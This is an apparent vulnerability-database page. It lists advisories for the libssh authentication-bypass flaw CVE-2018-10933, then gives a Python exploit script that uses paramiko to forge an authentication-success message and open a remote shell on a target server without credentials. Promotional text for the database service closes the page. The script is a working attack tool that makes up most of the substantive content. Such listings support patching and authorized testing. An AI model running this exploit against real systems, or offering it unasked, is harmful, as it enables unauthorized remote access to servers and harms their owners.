| Reporter | Title | Published | Views | Family All 104 |
|---|---|---|---|---|
| Security fix for the ALT Linux 9 package libssh version 0.8.4-alt1 | 17 Oct 201800:00 | – | altlinux | |
| Security fix for the ALT Linux 8 package libssh version 0.8.4-alt1 | 17 Oct 201800:00 | – | altlinux | |
| Security fix for the ALT Linux 9 package libssh version 0.8.4-alt2 | 17 Oct 201800:00 | – | altlinux | |
| Security fix for the ALT Linux 8 package libssh version 0.8.4-alt2 | 17 Oct 201800:00 | – | altlinux | |
| Security fix for the ALT Linux 7 package libssh version 0.7.6-alt1.M70P.1 | 22 Oct 201800:00 | – | altlinux | |
| libssh -- authentication bypass vulnerability | 16 Oct 201800:00 | – | freebsd | |
| Exploit for CVE-2018-10933 | 9 May 202116:50 | – | gitee | |
| Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-s, 1801-t and 1801-u | 5 Dec 201822:20 | – | ibm | |
| CVE-2018-10933 | 13 Mar 202000:00 | – | attackerkb | |
| CVE-2018-10933 | 17 Oct 201812:00 | – | alpinelinux |
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
args = parser.parse_args()
def BypasslibSSHwithoutcredentials(hostname, port):
sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
spawncmd = transport.open_session()
spawncmd.invoke_shell()
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
paramiko.util.log_to_file(args.logfile)
try:
hostname = args.host
port = args.port
except:
parser.print_help()
exit(1)
BypasslibSSHwithoutcredentials(hostname, port)
if __name__ == '__main__':
exit(main())
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation